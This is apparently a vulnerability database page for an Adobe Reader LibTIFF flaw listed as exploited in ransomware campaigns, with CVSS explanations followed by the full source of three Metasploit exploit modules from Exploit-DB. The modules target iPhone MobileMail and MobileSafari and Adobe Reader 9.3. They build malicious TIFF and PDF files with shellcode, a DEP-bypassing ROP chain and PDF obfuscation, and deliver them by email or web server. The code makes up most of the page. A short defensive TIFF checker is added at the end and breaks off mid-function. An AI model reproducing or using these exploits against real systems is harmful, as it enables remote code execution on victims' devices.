Related Weaknesses
CWE-ID | Weakness Name | Source
CWE Other | No information. |
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | nvd@nist.gov
V2 | 9.3 | | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov

How the V3.1 vector is read

Base: Exploitability Metrics. The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector (AV:L). This metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is not bound to the network stack and the attacker's path is via read/write/execute capabilities.

Attack Complexity (AC:L). This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required (PR:L). This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.

User Interaction (UI:N). This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics. The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope (S:U). Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which the vulnerable component resides, a Scope change occurs. Here, an exploited vulnerability can only affect resources managed by the same security authority: the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics. The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact (C:H). This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact (I:H). This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact (A:H). This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks only a small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics. The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics. These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user's organization, measured in terms of Confidentiality, Integrity, and Availability.
CISA KEV (Known Exploited Vulnerabilities)
Vulnerability name : Adobe Reader and Acrobat Arbitrary Code Execution Vulnerability
Required action : Apply updates per vendor instructions.
Known To Be Used in Ransomware Campaigns : Known
Added : 2022-03-02 23h00 +00:00
Action is due : 2022-03-23 23h00 +00:00
Important information
This CVE is listed in CISA's Catalog of Known Exploited Vulnerabilities (KEV) and poses an active threat: CISA records it as actively exploited in the wild, so applying the vendor updates and remediating this CVE should be prioritized to protect affected systems.
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 21869
Publication date : 2012-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: mobilemail_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  #
  # This module sends email messages via smtp
  #
  include Msf::Exploit::Remote::SMTPDeliver

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in the version of
        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
        1.1.1 of the Apple iPhone. iPhones which have not had the BSD
        tools installed will need to use a special payload.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['hdm', 'kf'],
      'Version'        => '$Revision: 15950 $',
      'References'     =>
        [
          ['CVE', '2006-3459'],
          ['OSVDB', '27723'],
          ['BID', '19283']
        ],
      'Stance'         => Msf::Exploit::Stance::Passive,
      'Payload'        =>
        {
          'Space'    => 1800,
          'BadChars' => "",
          'Compat'   =>
            {
              'ConnectionType' => '-bind -find',
            },
        },
      'Arch'           => ARCH_ARMLE,
      'Targets'        =>
        [
          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
            {
              'Platform' => 'osx',
              # Scratch space for our shellcode and stack
              'Heap'     => 0x00802000,
              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
              'Magic'    => 0x300d562c,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 01 2006'
    ))
  end

  def autofilter
    false
  end

  def exploit
    exts = ['jpg', 'tiff', 'tif']
    gext = exts[rand(exts.length)]
    name = rand_text_alpha(rand(10)+1) + ".#{gext}"
    data = Rex::Text.rand_text_alpha(rand(32)+1)
    tiff = generate_tiff(target)

    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
    msg.to = datastore['MAILTO']
    msg.from = datastore['MAILFROM']
    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), "text/plain", "base64", "inline")
    msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + "." + gext)

    send_message(msg.to_s)
    print_status("Waiting for a payload session (backgrounding)...")
  end

  def generate_tiff(targ)
    #
    # This is a TIFF file, we have a huge range of evasion
    # capabilities, but for now, we don't use them.
    # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
    #
    lolz = 2048

    tiff =
      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
      [lolz].pack("V") +
      "\x84\x00\x00\x00\x00\x00\x00\x00"

    # Randomize the bajeezus out of our data
    hehe = rand_text(lolz)

    # Were going to candy mountain!
    hehe[120, 4] = [targ['Magic']].pack("V")

    # >> add r0, r4, #0x30
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")

    # Candy mountain, Charlie!
    # >> mov r1, sp
    # It will be an adventure!
    # >> mov r2, r8
    hehe[ 92, 4] = [ hehe.length ].pack("V")

    # Its a magic leoplurodon!
    # It has spoken!
    # It has shown us the way!
    # >> bl _memcpy

    # Its just over this bridge, Charlie!
    # This magical bridge!
    # >> ldr r3, [r4, #32]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #32]
    # >> ldr r3, [r4, #36]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #36]
    # >> ldr r3, [r4, #40]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #40]
    # >> ldr r3, [r4, #44]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #44]

    # We made it to candy mountain!
    # Go inside Charlie!
    # sub sp, r7, #0x14
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")

    # Goodbye Charlie!
    # ;; targ['Heap'] + 0x48 becomes the stack pointer
    # >> ldmia sp!, {r8, r10}

    # Hey, what the...!
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

    # Return back to the copied heap data
    hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V")

    # Insert our actual shellcode at heap location + 196
    hehe[196, payload.encoded.length] = payload.encoded

    tiff << hehe
  end

end
Exploit Database EDB-ID : 21868
Publication date : 2012-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: safari_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in the version of
        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
        1.1.1 of the Apple iPhone. iPhones which have not had the BSD
        tools installed will need to use a special payload.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['hdm', 'kf'],
      'Version'        => '$Revision: 15950 $',
      'References'     =>
        [
          ['CVE', '2006-3459'],
          ['OSVDB', '27723'],
          ['BID', '19283']
        ],
      'Payload'        =>
        {
          'Space'    => 1800,
          'BadChars' => "",
          # Multi-threaded applications are not allowed to execve() on OS X
          # This stub injects a vfork/exit in front of the payload
          'Prepend'  =>
            [
              0xe3a0c042, # vfork
              0xef000080, # sc
              0xe3500000, # cmp r0, #0
              0x1a000001, # bne
              0xe3a0c001, # exit(0)
              0xef000080  # sc
            ].pack("V*")
        },
      'Arch'           => ARCH_ARMLE,
      'Targets'        =>
        [
          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
            {
              'Platform' => 'osx',
              # Scratch space for our shellcode and stack
              'Heap'     => 0x00802000,
              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
              'Magic'    => 0x300d562c,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 01 2006'
    ))
  end

  def on_request_uri(cli, req)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Grab reference to the target
    t = target

    print_status("Sending exploit")

    # Transmit the compressed response to the client
    send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })

    # Handle the payload
    handler(cli)
  end

  def generate_tiff(code, targ)
    #
    # This is a TIFF file, we have a huge range of evasion
    # capabilities, but for now, we don't use them.
    # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
    #
    lolz = 2048

    tiff =
      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
      [lolz].pack("V") +
      "\x84\x00\x00\x00\x00\x00\x00\x00"

    # Randomize the bajeezus out of our data
    hehe = rand_text(lolz)

    # Were going to candy mountain!
    hehe[120, 4] = [targ['Magic']].pack("V")

    # >> add r0, r4, #0x30
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")

    # Candy mountain, Charlie!
    # >> mov r1, sp
    # It will be an adventure!
    # >> mov r2, r8
    hehe[ 92, 4] = [ hehe.length ].pack("V")

    # Its a magic leoplurodon!
    # It has spoken!
    # It has shown us the way!
    # >> bl _memcpy

    # Its just over this bridge, Charlie!
    # This magical bridge!
    # >> ldr r3, [r4, #32]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #32]
    # >> ldr r3, [r4, #36]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #36]
    # >> ldr r3, [r4, #40]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #40]
    # >> ldr r3, [r4, #44]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #44]

    # We made it to candy mountain!
    # Go inside Charlie!
    # sub sp, r7, #0x14
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")

    # Goodbye Charlie!
    # ;; targ['Heap'] + 0x48 becomes the stack pointer
    # >> ldmia sp!, {r8, r10}

    # Hey, what the...!
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

    # Return back to the copied heap data
    hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V")

    # Insert our actual shellcode at heap location + 196
    hehe[196, payload.encoded.length] = payload.encoded

    tiff << hehe
  end

end
Exploit Database EDB-ID : 16670
Publication date : 2010-09-24 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: adobe_libtiff.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Acrobat Bundled LibTIFF Integer Overflow',
      'Description'    => %q{
        This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat
        Professional versions 8.0 through 8.2 and 9.0 through 9.3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Microsoft',                        # reported to Adobe
          'villy <villys777 [at] gmail.com>', # public exploit
          # Metasploit version by:
          'jduck'
        ],
      'Version'        => '$Revision: 10477 $',
      'References'     =>
        [
          [ 'CVE', '2010-0188' ],
          [ 'BID', '38195' ],
          [ 'OSVDB', '62526' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-07.html' ],
          [ 'URL', 'http://secunia.com/blog/76/' ],
          [ 'URL', 'http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'              => 'process',
          'InitialAutoRunScript' => 'migrate -f',
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # test results (on Windows XP SP3)
          # reader 6.0.1 - untested
          # reader 7.0.5 - untested
          # reader 7.0.8 - untested
          # reader 7.0.9 - untested
          # reader 7.1.0 - untested
          # reader 7.1.1 - untested
          # reader 8.0.0 - untested
          # reader 8.1.1 - untested
          # reader 8.1.2 - untested
          # reader 8.1.3 - untested
          # reader 8.1.4 - untested
          # reader 8.1.5 - untested
          # reader 8.1.6 - untested
          # reader 8.2.0 - untested
          # reader 9.0.0 - untested
          # reader 9.1.0 - untested
          # reader 9.2.0 - untested
          # reader 9.3.0 - works
          [ 'Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)',
            {
              # ew, hardcoded offsets - see make_tiff()
            }
          ],
        ],
      'DisclosureDate' => 'Feb 16 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
      ], self.class)
  end

  def exploit
    tiff_data = make_tiff(payload.encoded)
    xml_data = make_xml(tiff_data)
    compressed = Zlib::Deflate.deflate(xml_data)

    # Create the pdf
    pdf = make_pdf(compressed)

    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(pdf)
  end

  def RandomNonASCIIString(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  def ioDef(id)
    "%d 0 obj\r\n" % id
  end

  def ioRef(id)
    "%d 0 R" % id
  end

  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  def nObfu(str)
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end

  def ASCIIHexWhitespaceEncode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end

  def make_pdf(xml_data)
    xref = []
    eol = "\x0d\x0a"
    endobj = "endobj" << eol

    pdf = "%PDF-1.5" << eol
    pdf << "%" << RandomNonASCIIString(4) << eol

    xref << pdf.length
    pdf << ioDef(1) << nObfu("<</Filter/FlateDecode/Length ") << xml_data.length.to_s << nObfu("/Type /EmbeddedFile>>") << eol
    pdf << "stream" << eol
    pdf << xml_data << eol
    pdf << eol << "endstream" << eol
    pdf << endobj

    xref << pdf.length
    pdf << ioDef(2) << nObfu("<</V () /Kids [") << ioRef(3) << nObfu("] /T (") << "topmostSubform[0]" << nObfu(") >>") << eol << endobj

    xref << pdf.length
    pdf << ioDef(3) << nObfu("<</Parent ") << ioRef(2) << nObfu(" /Kids [") << ioRef(4) << nObfu("] /T (") << "Page1[0]" << nObfu(")>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << ioDef(4) << nObfu("<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P ") << ioRef(5)
    pdf << nObfu("/FT /Btn/TU (") << "ImageField1" << nObfu(")/Ff 65536/Parent ") << ioRef(3)
    pdf << nObfu("/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (") << "ImageField1[0]" << nObfu(")/Rect [107.385 705.147 188.385 709.087]>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << ioDef(5) << nObfu("<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent ")
    pdf << ioRef(6) << nObfu("/Type /Page/PieceInfo null>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << ioDef(6) << nObfu("<</Kids [") << ioRef(5) << nObfu("]/Type /Pages/Count 1>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << ioDef(7) << ("<</PageMode /UseAttachments/Pages ") << ioRef(6)
    pdf << ("/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm ") << ioRef(8)
    pdf << ("/Type /Catalog>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << ioDef(8) << nObfu("<</DA (/Helv 0 Tf 0 g )/XFA [(template) ") << ioRef(1) << nObfu("]/Fields [")
    pdf << ioRef(2) << nObfu("]>>")
    pdf << endobj << eol

    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(7) << ">>" << eol
    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol
    pdf << "%%EOF"
  end

  def make_tiff(code)
    tiff_offset = 0x2038
    shellcode_offset = 1500

    tiff = "II*\x00"
    tiff << [tiff_offset].pack('V')
    tiff << make_nops(shellcode_offset)
    tiff << code

    # Padding
    tiff << rand_text_alphanumeric(tiff_offset - 8 - code.length - shellcode_offset)

    tiff << "\x07\x00\x00\x01\x03\x00\x01\x00"
    tiff << "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
    tiff << "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
    tiff << "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
    tiff << "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
    tiff << "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
    tiff << "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00"

    # The following executes a ret2lib using BIB.dll
    # The effect is to bypass DEP and execute the shellcode in an indirect way
    stack_data = [
      0x70072f7,   # pop eax / ret
      0x10104,
      0x70015bb,   # pop ecx / ret
      0x1000,
      0x700154d,   # mov [eax], ecx / ret
      0x70015bb,   # pop ecx / ret
      0x7ffe0300,  # -- location of KiFastSystemCall
      0x7007fb2,   # mov eax, [ecx] / ret
      0x70015bb,   # pop ecx / ret
      0x10011,
      0x700a8ac,   # mov [ecx], eax / xor eax,eax / ret
      0x70015bb,   # pop ecx / ret
      0x10100,
      0x700a8ac,   # mov [ecx], eax / xor eax,eax / ret
      0x70072f7,   # pop eax / ret
      0x10011,
      0x70052e2,   # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
      0x7005c54,   # pop esi / add esp,0x14 / ret
      0xffffffff,
      0x10100,
      0x0,
      0x10104,
      0x1000,
      0x40,
      # The next bit effectively copies data from the interleaved stack to the memory
      # pointed to by eax
      # The data copied is:
      # \x5a\x52\x6a\x02\x58\xcd\x2e\x3c\xf4\x74\x5a\x05\xb8\x49\x49\x2a
      # \x00\x8b\xfa\xaf\x75\xea\x87\xfe\xeb\x0a\x5f\xb9\xe0\x03\x00\x00
      # \xf3\xa5\xeb\x09\xe8\xf1\xff\xff\xff\x90\x90\x90\xff\xff\xff\x90
      0x700d731,   # mov eax, [ebp-0x24] / ret
      0x70015bb,   # pop ecx / ret
      0x26a525a,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0x3c2ecd58,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0xf4745a05,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0x2a4949b8,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0xaffa8b00,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0xfe87ea75,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0xb95f0aeb,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0x3e0,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0x9eba5f3,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0xfffff1e8,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0x909090ff,
      0x700154d,   # mov [eax], ecx / ret
      0x700a722,   # add eax, 4 / ret
      0x70015bb,   # pop ecx / ret
      0x90ffffff,
      0x700154d,   # mov [eax], ecx / ret
      0x700d731,   # mov eax, [ebp-0x24] / ret
      0x700112f    # call eax -- (execute stub to transition to full shellcode)
    ].pack('V*')
    tiff << stack_data

    Rex::Text.encode_base64(tiff)
  end

  def make_xml(tiff_data)
    xml_data = %Q|<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">REPLACE_TIFF</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>
|
    xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
    xml_data
  end

end
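All three Metasploit modules above (and villy's script that follows, which builds the same IFD) deliver a TIFF whose first IFD carries a DotRange entry, tag 0x0150 of type SHORT, with a count far larger than the two values that tag is defined to hold: 0xCC in the Adobe module and 2048 (`lolz`) in the iPhone modules, with the oversized value array pointing at attacker-controlled bytes. The following added example, which is not part of any of the exploit code on this page, walks IFD0 of a TIFF and flags such entries, as well as out-of-line values that point past the end of the file; a hardened image pipeline can run this kind of sanity check before handing the file to a decoder. The sample TIFFs are constructed inline by the block itself and carry no payload, only zero bytes where the exploit places its ROP chain.

```python
"""Static sanity check for TIFF IFD entries, written as an added defensive example."""
import struct

# TIFF field type -> size of one value in bytes (TIFF 6.0 specification, section 2).
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}
TAG_DOTRANGE = 0x0150  # 336: defined to hold exactly two values
TAG_NAMES = {0x0100: "ImageWidth", 0x0101: "ImageLength", 0x0103: "Compression",
             0x0106: "PhotometricInterpretation", 0x0111: "StripOffsets",
             0x0117: "StripByteCounts", 0x011C: "PlanarConfiguration", 0x0150: "DotRange"}


def parse_ifd0(data):
    """Return the entries of the first IFD as dicts; raise ValueError on a malformed header."""
    if len(data) < 8:
        raise ValueError("too short for a TIFF header")
    if data[:2] == b"II":
        endian = "<"
    elif data[:2] == b"MM":
        endian = ">"
    else:
        raise ValueError("not a TIFF byte-order mark")
    magic, ifd_off = struct.unpack(endian + "HI", data[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    if ifd_off + 2 > len(data):
        raise ValueError("IFD offset beyond end of file")
    (n,) = struct.unpack(endian + "H", data[ifd_off:ifd_off + 2])
    entries = []
    pos = ifd_off + 2
    for _ in range(n):
        if pos + 12 > len(data):
            raise ValueError("truncated IFD")
        tag, typ, count, value = struct.unpack(endian + "HHII", data[pos:pos + 12])
        entries.append({"tag": tag, "name": TAG_NAMES.get(tag, hex(tag)),
                        "type": typ, "count": count, "value": value})
        pos += 12
    return entries


def find_suspicious_entries(data):
    """Flag IFD entries a hardened reader should reject before touching their data."""
    findings = []
    for e in parse_ifd0(data):
        size = TYPE_SIZES.get(e["type"])
        if size is None:
            findings.append(("unknown-type", e))
            continue
        nbytes = size * e["count"]
        # Values wider than 4 bytes live out of line: the offset must stay inside the file.
        if nbytes > 4 and e["value"] + nbytes > len(data):
            findings.append(("value-out-of-bounds", e))
        # DotRange is a pair; the exploit TIFFs on this page use counts of 0xCC and 2048.
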